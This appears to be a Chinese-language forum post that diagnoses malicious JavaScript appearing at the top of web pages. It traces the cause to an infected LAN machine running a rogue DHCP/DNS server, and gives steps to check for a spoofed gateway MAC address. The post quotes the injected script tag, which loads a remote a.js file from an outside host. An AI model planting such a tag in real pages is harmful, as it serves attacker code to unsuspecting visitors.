今天有人發現公司有些主機的網頁在頁面的第一行被惡意植入Java Script
內容如下
複製內容到剪貼板
代碼:
<script src=http://www.yuan-tai.com/home/include/1/a.js></script><title></title><title>Fuck Th3 W0rld!</title>
但有些Client 並沒有出現此一狀況
在確認公司主機並沒有問題後開始試著找尋其他可能。
最後確認的原因如下
Client 所在的區域網路, 有台電腦中毒了, 而這台電腦有 DHCP Server 與 DNS 等功能.
原本 Client 應該取得正常的 DNS , 卻抓到了偽造的 DNS 資料, 所以:
Client -> 向中毒的電腦連線 -> 中毒的電腦向真正的網站抓資料 -> 加上惡意程式 -> 傳回給 Client .
試著:
1. 指定 Client 使用固定的 IP 與 DNS , 再連 Server (用 IP 連)看看.
2. 當 Client 發生這情況時, 檢查 DHCP 主機, 及取得的 DNS 主機等資料.
例如:
正常:
192.168.1.254 -> 00:00:00:ff:ff:ff
偽造的主機
192.168.1.254 -> 00:aa:bb:cc:dd:ee
而 Client 向偽造的主機連線了.
如果確定有這台惡意主機在, 再去找出主機來處理.
參考資料:酷學園